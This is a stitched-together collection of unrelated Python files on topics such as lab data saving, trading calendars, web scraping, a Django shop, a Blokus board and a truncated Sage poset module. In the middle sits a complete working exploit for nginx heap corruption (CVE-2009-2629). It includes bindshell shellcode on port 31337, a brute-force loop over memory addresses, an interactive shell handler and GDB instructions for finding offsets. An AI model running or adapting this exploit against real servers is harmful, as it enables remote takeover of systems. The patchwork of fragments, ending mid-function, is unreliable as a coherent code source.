"""
This is the script for saving the hdf5 file containing the experiment data.
"""
import h5py
from pyccapt.control_tools import loggi
from pyccapt.control_tools import variables
def hdf_creator_oxcart(time_counter, time_ex_s, time_ex_m, time_ex_h):
# save hdf5 file
logger_creator = loggi.logger_creator('hdf5_creator', 'hdf5_creator.log')
logger_creator.info(
"Function - hdf_creator_oxcart | time_counter- > {} | type - {}".format(time_counter, type(time_counter)))
logger_creator.info(
"Function - hdf_creator_oxcart | time_ex_s- > {} | type - {}".format(time_ex_s, type(time_ex_s)))
logger_creator.info(
"Function - hdf_creator_oxcart | time_ex_m- > {} | type - {}".format(time_ex_m, type(time_ex_m)))
logger_creator.info(
"Function - hdf_creator_oxcart | time_ex_h- > {} | type - {}".format(time_ex_h, type(time_ex_h)))
with h5py.File(variables.path + '\\data_%s.h5' % variables.exp_name, "w") as f:
f.create_dataset("apt/high_voltage", data=variables.main_v_dc, dtype='f')
f.create_dataset("apt/pulse_voltage", data=variables.main_v_p, dtype='f')
f.create_dataset("apt/num_events", data=variables.main_counter, dtype='i')
f.create_dataset('apt/temperature', data=variables.main_temperature, dtype='f')
f.create_dataset('apt/main_chamber_vacuum', data=variables.main_chamber_vacuum, dtype='f')
f.create_dataset("apt/time_counter", data=time_counter, dtype='i')
f.create_dataset("time/time_s", data=time_ex_s, dtype='i')
f.create_dataset("time/time_m", data=time_ex_m, dtype='i')
f.create_dataset("time/time_h", data=time_ex_h, dtype='i')
if variables.counter_source == 'TDC':
f.create_dataset("dld/x", data=variables.x, dtype='i')
f.create_dataset("dld/y", data=variables.y, dtype='i')
f.create_dataset("dld/t", data=variables.t, dtype='i')
f.create_dataset("dld/start_counter", data=variables.dld_start_counter, dtype='i')
f.create_dataset("dld/high_voltage", data=variables.main_v_dc_dld, dtype='f')
f.create_dataset("dld/pulse_voltage", data=variables.main_v_p_dld, dtype='f')
elif variables.counter_source == 'TDC_Raw':
f.create_dataset("tdc/start_counter", data=variables.tdc_start_counter, dtype='i')
f.create_dataset("tdc/channel", data=variables.channel, dtype='i')
f.create_dataset("tdc/time_data", data=variables.time_data, dtype='i')
f.create_dataset("tdc/high_voltage", data=variables.main_v_dc_tdc, dtype='f')
f.create_dataset("tdc/pulse_voltage", data=variables.main_v_p_tdc, dtype='f')
elif variables.counter_source == 'DRS':
f.create_dataset("drs/ch0_time", data=variables.ch0_time, dtype='f')
f.create_dataset("drs/ch0_wave", data=variables.ch0_wave, dtype='f')
f.create_dataset("drs/ch1_time", data=variables.ch1_time, dtype='f')
f.create_dataset("drs/ch1_wave", data=variables.ch1_wave, dtype='f')
f.create_dataset("drs/ch2_time", data=variables.ch2_time, dtype='f')
f.create_dataset("drs/ch2_wave", data=variables.ch2_wave, dtype='f')
f.create_dataset("drs/ch3_time", data=variables.ch3_time, dtype='f')
f.create_dataset("drs/ch3_wave", data=variables.ch3_wave, dtype='f')
f.create_dataset("drs/high_voltage", data=variables.main_v_dc_drs, dtype='f')
f.create_dataset("drs/pulse_voltage", data=variables.main_v_p_drs, dtype='f')
def hdf_creator_physic(time_counter, time_ex_s, time_ex_m, time_ex_h):
# save hdf5 file
with h5py.File(variables.path + '\\data_%s.h5' % variables.exp_name, "w") as f:
f.create_dataset("apt/high_voltage", data=variables.main_v_dc, dtype='f')
f.create_dataset("apt/num_events", data=variables.main_counter, dtype='i')
f.create_dataset("apt/time_counter", data=time_counter, dtype='i')
f.create_dataset("time/time_s", data=time_ex_s, dtype='i')
f.create_dataset("time/time_m", data=time_ex_m, dtype='i')
f.create_dataset("time/time_h", data=time_ex_h, dtype='i')
if variables.counter_source == 'TDC':
f.create_dataset("dld/x", data=variables.x, dtype='i')
f.create_dataset("dld/y", data=variables.y, dtype='i')
f.create_dataset("dld/t", data=variables.t, dtype='i')
f.create_dataset("dld/AbsoluteTimeStamp", data=variables.dld_start_counter, dtype='i')
f.create_dataset("dld/high_voltage", data=variables.main_v_dc_dld, dtype='f')
f.create_dataset("tdc/ch0", data=variables.ch0, dtype='i')
f.create_dataset("tdc/ch1", data=variables.ch1, dtype='i')
f.create_dataset("tdc/ch2", data=variables.ch2, dtype='i')
f.create_dataset("tdc/ch3", data=variables.ch3, dtype='i')
f.create_dataset("tdc/ch4", data=variables.ch4, dtype='i')
f.create_dataset("tdc/ch5", data=variables.ch5, dtype='i')
f.create_dataset("tdc/ch6", data=variables.ch6, dtype='i')
f.create_dataset("tdc/ch7", data=variables.ch6, dtype='i')
|
def run():
r.setpos(0,0,0)
r.conf_set('enable_stuck', 1)
r.speed(40)
@_on('motion:stuck')
def _():
_goto('after_stuck', ref='main')
r.goto(-1000, 0, -1)
_label('after_stuck')
r.setpos(x=155/2-1500)
r.goto(0,0)
|
def main():
N, S = input().split()
N = int(N)
result = 0
for i in range(N):
a, b = 0, 0
for c in S[i:]:
if c == 'A':
a += 1
elif c == 'T':
a -= 1
elif c == 'C':
b += 1
elif c == 'G':
b -= 1
if a == 0 and b == 0:
result += 1
print(result)
main()
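# The nested loop above is O(N^2). A linear-time alternative (a sketch, not
# part of the original solution): encode each prefix as a state (a, b); a
# substring is balanced exactly when its two bounding prefixes share a state.
def count_balanced(s):
    from collections import Counter
    delta = {'A': (1, 0), 'T': (-1, 0), 'C': (0, 1), 'G': (0, -1)}
    a = b = 0
    seen = Counter({(0, 0): 1})
    total = 0
    for ch in s:
        da, db = delta[ch]
        a, b = a + da, b + db
        total += seen[(a, b)]  # every earlier equal state closes one balanced substring
        seen[(a, b)] += 1
    return total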
|
import datetime
from pandas import Timestamp, DatetimeIndex, DataFrame
from backtrader.tradingcal import TradingCalendarBase
from backtrader.utils import tzparse
from backtrader.utils.py3 import string_types
class TradingCalendarsTradingCalendar(TradingCalendarBase):
params = (
('calendar', None),
('cachesize', 365),
('tz', None),
)
def __init__(self): # pylint: disable=super-init-not-called
self._calendar = self.p.calendar # pylint: disable=no-member
if isinstance(self._calendar, string_types):
from trading_calendars import get_calendar
self._calendar = get_calendar(self._calendar)
self.dcache = DatetimeIndex([0.0])
self.idcache = DataFrame(index=DatetimeIndex([0.0]))
self.csize = datetime.timedelta(days=self.p.cachesize) # pylint: disable=no-member
self._tz = self.p.tz # pylint: disable=no-member
if self._tz is None:
self._tz = self._calendar.tz
elif isinstance(self._tz, string_types):
self._tz = tzparse(self._tz)
def _nextday(self, day):
d = day + self._calendar.day
return d, d.isocalendar()
def schedule(self, day, tz=None): # pylint: disable=arguments-differ
session = Timestamp(year=day.year, month=day.month, day=day.day)
opening, closing = self._calendar.open_and_close_for_session(session)
if tz is None:
tz = self._tz
if tz is not None:
opening = opening.astimezone(tz)
closing = closing.astimezone(tz)
opening = opening.to_pydatetime()
closing = closing.to_pydatetime()
return opening, closing
class KrxTradingCalendar(TradingCalendarsTradingCalendar):
params = (
('calendar', 'XKRX'),
('cachesize', 365),
('tz', 'Asia/Seoul'),
)
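# Hedged usage sketch (not part of the original module): wiring the calendar
# into a backtrader Cerebro instance. Assumes the trading_calendars package
# with the XKRX calendar is installed alongside backtrader.
if __name__ == '__main__':
    import backtrader as bt
    cerebro = bt.Cerebro()
    cerebro.addcalendar(KrxTradingCalendar())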
|
import itertools
import logging
import os
import time
from urllib.parse import urlparse
from urllib.request import quote
import requests
from bs4 import BeautifulSoup
from requests.exceptions import TooManyRedirects
logging.basicConfig(format='%(asctime)s - %(message)s', level=logging.INFO)
class AccountHandler:
def __init__(self, account_list_path:str=None):
self.account_list_path = account_list_path or os.environ.get("ACCOUNT_LIST_PATH")
        self.account_rotator = self.account_rotation_generator()
def rotate(self) -> str:
account_key = next(self.account_rotator)
self.set_account(account_key)
return account_key
    def account_rotation_generator(self) -> itertools.cycle:
with open(self.account_list_path) as account_file:
accounts = [account.strip() for account in account_file.readlines()]
if not accounts:
accounts = [""]
round_robin = itertools.cycle(accounts)
return round_robin
@staticmethod
def set_account(auth_key:str=None) -> None:
os.environ["UK_AUTH_KEY"] = auth_key
def get_content_make_soup(url:str, **kwargs) -> BeautifulSoup:
page_content = get_content(url=url, **kwargs)
if page_content == 1:
return 1
soup = BeautifulSoup(page_content, features="html.parser")
return soup
def get_content(url: str, headers: dict = None, proxy="") -> bytes:
    default_headers = {'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0"}
    headers = {**default_headers, **(headers or {})}  # no mutable default; caller-supplied headers take precedence
url_parts = urlparse(url)
url = url_parts._replace(path=quote(url_parts.path)).geturl()
sleep_time = 5
while True:
try:
resp = requests.get(url,
proxies=dict(http=proxy, https=proxy),
headers=headers)
return resp.content
        except TooManyRedirects as e:
            logging.error(f"TooManyRedirects, url: {url}, Error: {e}")
return 1
except Exception as e:
logging.error(f"Network Error, url: {url}, Error: {e}")
time.sleep(sleep_time)
sleep_time += 1
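# Hedged usage sketch (not part of the original module): assumes an account
# file with one key per line at the placeholder path below.
if __name__ == "__main__":
    handler = AccountHandler(account_list_path="accounts.txt")
    current_key = handler.rotate()  # sets UK_AUTH_KEY and returns the key
    soup = get_content_make_soup("https://example.com")
    if soup != 1:  # module convention: 1 signals a failed fetch
        logging.info("fetched page titled: %s", soup.title)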
|
import requests as rs
from .makerequest import makeRequest
make = makeRequest("token")
def checkAvailableUser(username):
"""This function will return
whether the given username for registration is available for new registration"""
resp = rs.get(make.API + "/register/search/?username={}".format(username))
return resp
def addMedicine(medicine: object):
"""Data required are "name", "description", "price", "quantity", "medicalId" """
return make.makePostRequest(make.API + "/medicine/", medicine)
def createMedical(medical: object, file):
"""Data required are Medical "name", "address", "pincode", "latitude", "longitude", "phone", "email" """
return make.CreateMedicalPost(make.API + "/", medical, file)
def getMedicine(medical_id):
resp = make.GetRequest(make.API + "/mymedical/{}/".format(medical_id))
return resp
def getMyMedical():
resp = make.GetRequest(make.API + "/mymedical/")
return resp
def getMedicalDetails(medical_id):
resp = make.GetRequest(make.API + "/{}/".format(medical_id))
return resp.json()[0]
def getUserDetails(name):
userMake = makeRequest(name)
resp = userMake.GetRequest(make.API + "/user/")
return resp
def getMedicineDetails(ID):
return make.GetRequest(make.API + '/medicine/{}/'.format(ID))
def deleteMedicine(ID):
return make.DeleteRequest(make.API + '/medicine/{}/'.format(ID))
def deleteMedical(ID):
return make.DeleteRequest(make.API + '/{}/'.format(ID))
def updateMedicine(medicine: object, ID):
return make.PutRequest(make.API + '/medicine/{}/'.format(ID), medicine)
def updateMedical(medical, ID):
return make.PutRequest(make.API + '/{}/'.format(ID), medical)
def getTrendingMed(pincode):
return make.GetRequest(make.API + '/popularmedicine/?pincode={}'.format(pincode))
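# Hedged usage sketch (field names taken from the docstrings above; the
# values are placeholders, not real data): create a medicine entry.
if __name__ == "__main__":
    new_medicine = {
        "name": "Paracetamol",
        "description": "500 mg tablets",
        "price": 20,
        "quantity": 100,
        "medicalId": 1,
    }
    resp = addMedicine(new_medicine)
    print(resp)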
|
#!/usr/bin/env python
#
# Exploit Title: nginx heap corruption
# Date: 08/26/2010
# Author: aaron conole <[email protected]>
# Software Link: http://nginx.org/download/nginx-0.6.38.tar.gz
# Version: <= 0.6.38, <= 0.7.61
# Tested on: BT4R1 running nginx 0.6.38 locally
# CVE: 2009-2629
#
# note: this was written and tested against BT4. This means it's an
# intel x86 setup (ie: offsets for 32-bit machine, etc.). YMMV
# also - only tested successfully against nginx 0.6.38
# you'll definitely need to modify against other versions
#
# you'll need to know where the offset is going to land, and what the pad is
# from that point to when you've tainted execution flow.
#
# A quick way to find out just for verification would be to launch nginx,
# attach GDB to the worker and target it with the exploit, setting the offset
# to 0, or some other arbitrary value. It should crash on a piece of code which
# resembles:
# if (ctx->offset)
#
# At that point, merely dump the *r; capture the value for the data pointer
# (it'll be the one with "GET //../Aa0") and add 131 to it (decimal 131 to the
# hex pointer value). That should give you a good area to test with. You might
# want to use the range at that point and set the last octet to 00.
#
# NOTE: you'll need a configuration with merge_slashes enabled. I haven't yet
# found a "magic" combination that would cause the state machine to do
# what I want to make the bug trigger. Once I do, you can bet BUG will be
# replaced.
#Basically, on BT4:
#- compile
#- edit the configuration to enable merge slashes (just insert a line above the sendpage / sendfile config option "merge_slashes off;")
#- Launch nginx, and attach GDB to the worker
#- Send the exploit at it with offset 0x11111111
#- When the worker gets a sigsegv, it will be on a line which looks like "if (ctx->offset)", at that point type "p *r"
#- In the r data structure will be a few different fields, one which is a buffer that contains "GET //../Aa0Aa1Aa2..". This buffer has an address (lets say 0x8c1d32f).
#- Save off this address, and detach from the worker. A new one will spawn (the "manager" process will keep it going).
#- At this point, rerun the exploit, setting the offset to 0x8c1d300 and adding the -b flag
#- In a minute or two, you should be given the shell.
import os
import sys
import socket
import select
import struct
import time
import urllib
REQUEST_METHOD='GET '
# NOTE - this is a 32-bit null pointer. A 64-bit version would be 8-bytes (but take care to re-verify the structures)
NULLPTR='\x00\x00\x00\x00'
# NOTE - this shellcode was shamelessly stolen from the www
# port 31337 bindshell for /bin/sh
SHELL='\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x43\x53\x89\xe1\x4b\xcd\x80\x89\xc7\x52\x66\x68\x7a\x69\x43\x66\x53\x89\xe1\xb0\x10\x50\x51\x57\x89\xe1\xb0\x66\xcd\x80\xb0\x66\xb3\x04\xcd\x80\x50\x50\x57\x89\xe1\x43\xb0\x66\xcd\x80\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80\x41\xe2\xf8\x51\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x51\x53\x89\xe1\xb0\x0b\xcd\x80'
# Why did I write this up this way? Because given enough time, I think I can
# find a proper set of state change which can give me the same effect (ie: ../
# appearing as the 3rd, 4th, and 5th characters) at a later date.
# That's all controlled by the complex uri parsing bit, though.
DOUBLE_SLASH='//../'
BUG=DOUBLE_SLASH
# taken from the metasploit pattern_create.rb
PATTERN='Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4'
def connect_socket(host,port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect( (host, port) )
except:
return 0
#sock.setblocking(0)
return sock
def handle_connection(sock):
while(1):
r, w, e = select.select( [sock, sys.stdin],
[],
[sock, sys.stdin] )
for s in r:
if s == sys.stdin:
buf = sys.stdin.readline()
try:
if buf != '':
sock.send(buf)
except:
print "Xon close?"
return 0
elif s == sock:
try:
buf = sock.recv(100)
except:
print "Xon close?"
return 0
if buf != '':
sys.stdout.write(buf)
def main(argv):
argc = len(argv)
if argc < 4:
print "usage: %s <host> <port> <ctx_addr> [-b]" % (argv[0])
print "[*] exploit for nginx <= 0.6.38 CVE 2009-2629"
print "[*] host = the remote host name"
print "[*] port = the remote port"
print "[*] ctx_addr is where the context address should begin at"
print "[*] -b specifies a brute-force (which will start at ctx_addr"
sys.exit(0)
host = argv[1]
port = int(argv[2])
ctx_addr = int(argv[3],16)
brute_flag = 0
if(argc == 5):
brute_flag = 1
testing = 1
print "[*] target: %s:%d" % (host, port)
try:
sd = urllib.urlopen("http://%s:%d" % (host, port))
sd.close()
except IOError, errmsg:
print "[*] error: %s" % (errmsg)
sys.exit(1)
print "[*] sending exploit string to %s:%d" % (host, port)
while(testing):
CTX_ADDRESS = struct.pack('<L',ctx_addr)
CTX_OUT_ADDRESS = struct.pack('<L', ctx_addr-60)
POOL_ADDRESS = struct.pack('<L',ctx_addr+56)
DATA_ADDRESS = struct.pack('<L',ctx_addr+86)
RANGE_ADDRESS = struct.pack('<L',ctx_addr+124)
SHELL_ADDRESS = struct.pack('<L',ctx_addr+128)
#PADDING
SHELLCODE=PATTERN[:67]
#the output context structure
SHELLCODE+=NULLPTR*9+POOL_ADDRESS+NULLPTR*4+SHELL_ADDRESS
#Magic
SHELLCODE+=CTX_OUT_ADDRESS+CTX_ADDRESS+NULLPTR
#this is the context object - some null ptrs, then we set range, then
#pool address
SHELLCODE+=NULLPTR*3+RANGE_ADDRESS+'\x01\x00\x00\x00'
SHELLCODE+=NULLPTR*2+POOL_ADDRESS
#this is the data buffer object
SHELLCODE+=NULLPTR*4+SHELL_ADDRESS+NULLPTR
#this is the pool memory structure ..
SHELLCODE+=DATA_ADDRESS+NULLPTR+POOL_ADDRESS+NULLPTR*12+NULLPTR
# this is the range structure
SHELLCODE+='\xff\xff\xff\xff'+NULLPTR*3
SHELLCODE+=SHELL
payload = REQUEST_METHOD
payload += BUG
payload += SHELLCODE
payload += ' HTTP/1.0\r\n\r\n'
sd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sd.connect((host, port))
sd.send(payload)
sd.close()
if (brute_flag):
nsock = connect_socket(host,31337)
if nsock != 0:
print "[*] Successful Exploit via buffer: %x" % (ctx_addr)
testing = 0
handle_connection(nsock)
else:
ctx_addr = ctx_addr + 1
else:
testing = 0
print "[*] FIN."
if __name__ == "__main__":
main(sys.argv)
sys.exit(0)
# EOF
|
from django.shortcuts import render, get_object_or_404,redirect
from django.views.generic import TemplateView, ListView
from cart.forms import CartAddProductForm
from .models import Category, Product
from django.contrib.auth.decorators import login_required
from django.conf import settings
from django.contrib.auth.forms import AuthenticationForm
from django.contrib.auth import authenticate,login,logout
from .forms import SignUpForm, RepairForm
from django.core.paginator import Paginator
from django.core.mail import send_mail
# Create your views here.
def homepage(request):
return render(request, 'shop/product/home.html')
def repairspage(request):
return render(request, 'shop/product/repairs.html')
def phonepage(request):
    products = Product.objects.filter(category__slug='phones')
    categories = Category.objects.all()
    return render(request, 'shop/product/phone.html', {'products': products, 'categories': categories})
def laptoppage(request):
    products = Product.objects.filter(category__slug='laptops')
    categories = Category.objects.all()
    return render(request, 'shop/product/laptop.html', {'products': products, 'categories': categories})
def tvpage(request):
    products = Product.objects.filter(category__slug='tvs')
    categories = Category.objects.all()
    return render(request, 'shop/product/tv.html', {'products': products, 'categories': categories})
def product_list(request, category_slug=None):
myproduct_list = Product.objects.all()
    paginator = Paginator(myproduct_list, 20)  # show 20 products per page
    page_number = request.GET.get('page')
    page_obj = paginator.get_page(page_number)
phones = Product.objects.filter(category__name='phones')
category = None
categories = Category.objects.all()
products = Product.objects.filter(available=True)
if category_slug:
category = get_object_or_404(Category, slug=category_slug)
products = products.filter(category=category)
return render(request,
'shop/product/list.html',
{'category': category,
'categories': categories,
'products': products,
'page_obj': page_obj,
'phones':phones})
def product_detail(request, id, slug):
product = get_object_or_404(Product,id=id,slug=slug,available=True)
cart_product_form = CartAddProductForm()
return render(request,
'shop/product/detail.html',
{'product': product,
'cart_product_form': cart_product_form})
def signUpView(request):
if request.method == "POST":
form =SignUpForm(request.POST)
if form.is_valid():
form.save()
username = form.cleaned_data['username']
password = form.cleaned_data['password1']
user = authenticate(request, username=username, password=password)
login(request,user)
return redirect('shop:product_list')
else:
form = SignUpForm()
context = {
'form':form,
}
return render(request,'shop/auth/signup.html',context)
def repair_form(request):
if request.method == 'POST':
# create object of form
form = RepairForm(request.POST)
if form.is_valid():
# save the form data to model
form.save()
else:
form = RepairForm()
context = {
'form':form,
}
return render(request,'shop/product/repair.html', context)
def signInView(request):
if request.method == 'POST':
form =AuthenticationForm(data=request.POST)
if form.is_valid():
username = request.POST['username']
password = request.POST['password']
user =authenticate(username=username,password=password)
if user is not None:
login(request,user)
return redirect('shop:product_list')
else:
return redirect('shop:signup')
else:
form = AuthenticationForm()
context = {
'form':form,
}
return render(request,'shop/auth/signin.html',context)
def signoutView(request):
logout(request)
return redirect('shop:signin')
def search(request):
    product_name = request.GET.get('search', '')
    products = Product.objects.filter(name__icontains=product_name)
    categories = Category.objects.all()
    return render(request, 'shop/product/search.html', {'products': products, 'categories': categories})
|
import boto3
from auditlog.writer.writer import kinesis_writer
kinesis_writer.set_client(boto3.client('kinesis', endpoint_url='http://localhost:4566/'))
|
# coding: utf-8
'''
@author: memect
@date: 16/04/2018
@mail: [email protected]
@description: Python 3 sample code for fetching listed-company data:
basic information, income statement, balance sheet, and cash-flow statement.
'''
import requests
import json
import config
HEADERS = config.HEADERS  # {'Authorization': APPCODE}
class CompanyInfoAPI:
    def __init__(self, field, eng_name):
        """field in ["资产负债表" (balance sheet), "现金流量表" (cash-flow statement),
        "基本信息" (basic info), "利润表" (income statement)]; the API expects the Chinese names.
        eng_name in ["balance_sheet_info", "cash_flows_statement_info", "f10_info", "income_statmenet_info"]
        """
        self.field = field
        self.eng_name = eng_name
    def _get_info(self, url, query_dict=None):
        """Fetch company information from the given endpoint."""
        if query_dict is None:
            query_dict = {"field": "基本信息", "period": "2017"}
response = requests.request("GET", url, headers=HEADERS, params=query_dict)
print(response.status_code)
return response.status_code, response.text
def get_company_info(self, company_code, period):
URL = 'http://memect0006.market.alicloudapi.com/company/' + company_code
querystring = {"field": self.field, "period": period}
status_code, res_text = self._get_info(url=URL, query_dict=querystring)
if status_code != 200:
return False, None
json_dict = json.loads(res_text)
json_dict['company_code'] = company_code
json_dict['period'] = period
return True, json_dict
def get_company_code_list_info(self,period):
"""根据period和field筛选符合条件的公司股票代码list。
period in [2015,2016,2017Q3,2017]
"""
URL = 'http://memect0006.market.alicloudapi.com/companys/codelist'
querystring = {"field": self.field, "period": period}
status_code, res_text = self._get_info(url=URL, query_dict=querystring)
if status_code != 200:
print(res_text)
return False, None
js_list = json.loads(res_text)
return True,js_list
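# Hedged end-to-end sketch (not part of the original): fetch the code list
# for one period, then pull each company's data with a short pause between
# calls. The pause length is an assumption, not a documented API limit, and
# the code list is assumed to be a flat list of stock-code strings.
def fetch_all(api, period="2017", delay_seconds=0.5):
    import time
    ok, codes = api.get_company_code_list_info(period=period)
    if not ok:
        return []
    results = []
    for code in codes:
        success, record = api.get_company_info(company_code=code, period=period)
        if success:
            results.append(record)
        time.sleep(delay_seconds)  # stay polite to the metered endpoint
    return results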
if __name__ == '__main__':
    cash_api = CompanyInfoAPI(field="现金流量表", eng_name='cash_flows_statement_info')
res, text = cash_api.get_company_code_list_info(period="2017")
print(res, text)
res, text = cash_api.get_company_info(company_code='000001',period="2017")
print(res, text)
# get_income_statmenet_info(company_code="000001",period="2016")
# get_balance_sheet_info(company_code="000005",period="2015")
# get_cash_flows_statement_info(company_code="600000",period="2015")
|
with open('input2.txt', 'r') as file:
data = file.read().split('\n')
v = 0
iv = 0
for line in data:
if line.count(' ') != 2:
continue
r, l, p = line.split(' ')
min_, max_ = map(int, r.split('-'))
min_ -= 1
max_ -= 1
l = l.replace(':', '')
    # Part 2 rule: exactly one of the two 1-based positions may hold the letter.
    # If the password is too short to index max_, only the min_ position is checked.
    if (len(p) > max_ and ((p[min_] == l) ^ (p[max_] == l))) or (min_ < len(p) <= max_ and p[min_] == l):
v += 1
else:
# print(r,l,p)
iv += 1
print(v, iv)
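# A compact alternative (a sketch assuming well-formed "lo-hi letter: password"
# lines, as the puzzle input guarantees, so no length guards are needed):
def valid_part2(line):
    rng, letter, password = line.split()
    i, j = (int(n) - 1 for n in rng.split('-'))
    letter = letter.rstrip(':')
    return (password[i] == letter) ^ (password[j] == letter)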
|
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
# SPDX-License-Identifier: MIT-0
def joe_say(text):
template = r'''
=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=
// {message} \\
=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=
\\
\\
----------------
/ \
/ \
| OO O0 |
| OO OO |
\ - /
\ DDDDDD /
\ DDDD /
\____________/
'''.format(message=text)
return template
|
import numpy as np
from piece import Piece
import time
from scipy.ndimage import convolve
class Board:
def __init__(self, size = 20, player_colors = [1,2,3,4]):
self.size = size
self.board = np.zeros((size,size), dtype = int)
self.start_squares = [[0,0], [0, size-1], [size-1, 0], [size-1, size-1]]
self.player_colors = player_colors
        self.c = [[1,0,1],[0,0,0],[1,0,1]]  # diagonal-neighbour (corner) kernel
        self.a = [[0,1,0],[1,1,1],[0,1,0]]  # orthogonal-neighbour (adjacency) kernel
def add_piece(self, piece, x, y):
if not self.valid_move(piece, x, y):
return False
p_shape = piece.get_shape()
px, py = p_shape.shape
self.board[x:x + px, y:y+py] += p_shape
return True
def valid_move(self, piece, x, y):
p_shape = piece.get_shape()
p_color = piece.get_color()
px, py = p_shape.shape
shape_coords = np.argwhere(p_shape != 0) + [x,y]
if x + px > self.size or y + py > self.size: #Piece off the edge of the board
#print("Piece off the edge of the board")
return False
if len(np.nonzero(self.board[x:x+px,y:y+py] * piece.get_shape())[0]) > 0: #Piece on top of another piece
#print("Piece on top of another")
return False
for i in self.generate_adjacents(shape_coords): #Piece adjacent to same color
if i[0] < self.size and i[0] >= 0 and i[1] < self.size and i[1] >= 0 and self.board[i] == p_color:
#print("piece adjacent to the same color")
return False
for i in self.generate_corners(shape_coords): #Piece is touching a corner
if i[0] < self.size and i[0] >= 0 and i[1] < self.size and i[1] >= 0 and self.board[i] == p_color:
return True
        for coord in shape_coords:  # renamed from x, which shadowed the x argument
            if list(coord) in self.start_squares:
                return True
#print("else")
return False
def generate_adjacents(self, shape_coords):
adj = set()
for i in shape_coords:
adj.add((i[0] + 1, i[1]))
adj.add((i[0], i[1] + 1))
adj.add((i[0] - 1, i[1]))
adj.add((i[0], i[1] - 1))
return adj
def generate_corners(self, shape_coords):
corners = set()
for i in shape_coords:
corners.add((i[0] + 1, i[1] + 1))
corners.add((i[0] - 1, i[1] + 1))
corners.add((i[0] + 1, i[1] - 1))
corners.add((i[0] - 1, i[1] - 1))
#print(corners - self.generate_adjacents(shape_coords)) #true corners
return corners
def get_color_corners(self, color):
one_color_board = np.array(self.board == color, dtype="int") * color
corner_board = convolve(one_color_board, self.c, mode='constant') - 20 * convolve(one_color_board, self.a, mode='constant') - 20 * self.board
return np.array(np.where(corner_board >= 1))
def get_moves_list(self, player, corners):
playable_moves = []
pcs = player.get_pieces()
if len(pcs) == 21:
start_squares = np.array([[0,0,19,19],[0,19,0,19]])
corners = np.hstack((corners, start_squares))
for p in pcs:
moves = pcs[p].get_legal_moves()
pcs[p].reset()
for m in moves:
for c in m:
if c == 'r':
pcs[p].rotate()
elif c == 'f':
pcs[p].flip()
for i in moves[m]:
shp = pcs[p].get_shape()
for j in range(len(corners[0])):
x = corners[0,j]+i[0]
y = corners[1,j]+i[1]
if x < 0 or x > self.size - 1:
pass
elif y < 0 or y > self.size - 1:
pass
elif self.valid_move(pcs[p],x,y):
playable_moves.append((p, m, x, y))
pcs[p].reset()
return playable_moves
def get_board(self):
return self.board
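# Toy illustration (not part of the original class) of the kernel trick used
# in get_color_corners: a single placed square scores positively only at its
# diagonal neighbours, which are exactly the legal Blokus growth points.
if __name__ == '__main__':
    demo = np.zeros((5, 5), dtype=int)
    demo[2, 2] = 1
    c = [[1, 0, 1], [0, 0, 0], [1, 0, 1]]  # diagonal contacts
    a = [[0, 1, 0], [1, 1, 1], [0, 1, 0]]  # orthogonal contacts
    score = convolve(demo, c, mode='constant') - 20 * convolve(demo, a, mode='constant') - 20 * demo
    print(np.argwhere(score >= 1))  # -> the four diagonal cells around (2, 2)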
|
"""
Cartesian products of Posets
AUTHORS:
- Daniel Krenn (2015)
"""
#*****************************************************************************
# Copyright (C) 2015 Daniel Krenn <[email protected]>
#
# Distributed under the terms of the GNU General Public License (GPL)
# as published by the Free Software Foundation; either version 2 of
# the License, or (at your option) any later version.
# http://www.gnu.org/licenses/
#*****************************************************************************
from __future__ import print_function
from sage.sets.cartesian_product import CartesianProduct
class CartesianProductPoset(CartesianProduct):
r"""
A class implementing Cartesian products of posets (and elements
thereof). Compared to :class:`CartesianProduct` you are able to
specify an order for comparison of the elements.
INPUT:
- ``sets`` -- a tuple of parents.
- ``category`` -- a subcategory of
``Sets().CartesianProducts() & Posets()``.
- ``order`` -- a string or function specifying an order less or equal.
It can be one of the following:
- ``'native'`` -- elements are ordered by their native ordering,
i.e., the order the wrapped elements (tuples) provide.
- ``'lex'`` -- elements are ordered lexicographically.
- ``'product'`` -- an element is less or equal to another
element, if less or equal is true for all its components
(Cartesian projections).
- A function which performs the comparison `\leq`. It takes two
input arguments and outputs a boolean.
Other keyword arguments (``kwargs``) are passed to the constructor
of :class:`CartesianProduct`.
EXAMPLES::
sage: P = Poset((srange(3), lambda left, right: left <= right))
sage: Cl = cartesian_product((P, P), order='lex')
sage: Cl((1, 1)) <= Cl((2, 0))
True
sage: Cp = cartesian_product((P, P), order='product')
sage: Cp((1, 1)) <= Cp((2, 0))
False
sage: def le_sum(left, right):
....: return (sum(left) < sum(right) or
....: sum(left) == sum(right) and left[0] <= right[0])
sage: Cs = cartesian_product((P, P), order=le_sum)
sage: Cs((1, 1)) <= Cs((2, 0))
True
TESTS::
sage: Cl.category()
Join of Category of finite posets and
Category of Cartesian products of finite enumerated sets
sage: TestSuite(Cl).run()
sage: Cp.category()
Join of Category of finite posets and
Category of Cartesian products of finite enumerated sets
sage: TestSuite(Cp).run()
.. SEEALSO::
:class:`CartesianProduct`
"""
def __init__(self, sets, category, order=None, **kwargs):
r"""
See :class:`CartesianProductPoset` for details.
TESTS::
sage: P = Poset((srange(3), lambda left, right: left <= right))
sage: C = cartesian_product((P, P), order='notexisting')
Traceback (most recent call last):
...
ValueError: No order 'notexisting' known.
sage: C = cartesian_product((P, P), category=(Groups(),))
sage: C.category()
Join of Category of groups and Category of posets
"""
if order is None:
self._le_ = self.le_product
elif isinstance(order, str):
try:
self._le_ = getattr(self, 'le_' + order)
except AttributeError:
